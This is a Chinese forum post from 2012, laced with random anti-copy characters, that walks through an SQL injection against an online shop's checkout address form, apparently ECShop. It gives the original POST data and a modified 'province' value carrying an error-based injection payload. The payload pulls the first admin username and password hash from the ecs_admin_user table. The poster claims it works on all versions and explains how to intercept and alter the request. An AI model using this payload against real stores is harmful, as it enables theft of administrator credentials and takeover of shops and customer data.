感谢欠杀的黑盒
" R# a) L& ?! `9 C( {; F, j M6 S: K2 p- g8 h* r9 f9 g8 {% ~4 R
& C0 c+ W" S0 N* v- I3 j$ ~
把任意商品加入购物车在填写配送地址那一页,有地区选择
- x% L* W! [+ \" k2 ]! ^7 q 5 m5 b% V, X9 h
flow.php?step=consignee&direct_shopping=1" p) t4 s4 s6 F/ g5 X ^
比如省选择安徽- c1 K/ D. `2 n
' X+ {: C9 R; s8 |其中POST数据如下
4 k l2 U+ \) _
* h7 V# n0 j1 [! ?country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=39 x+ d j( A5 l2 b( C+ C; k
改成
g5 v6 U8 `* v d : r% x \2 I$ z( S- P* [
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #+ i/ b! s. t+ B" D; h
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
9 b0 j; H& v, `) G2 b, K K
* \6 ]9 ]' Y* v! U- F6 e先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
5 {# M) E) p4 ]: w }6 P! d% p
' @5 S# h d, c" z4 N就会回显错误页面了。。。。% O% l' F8 K+ B1 e
1 S0 `& R0 i$ z6 v我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的6 H# X0 [7 s: @4 {
|
发表于 2012-12-31 09:19:27
收藏
支持
反对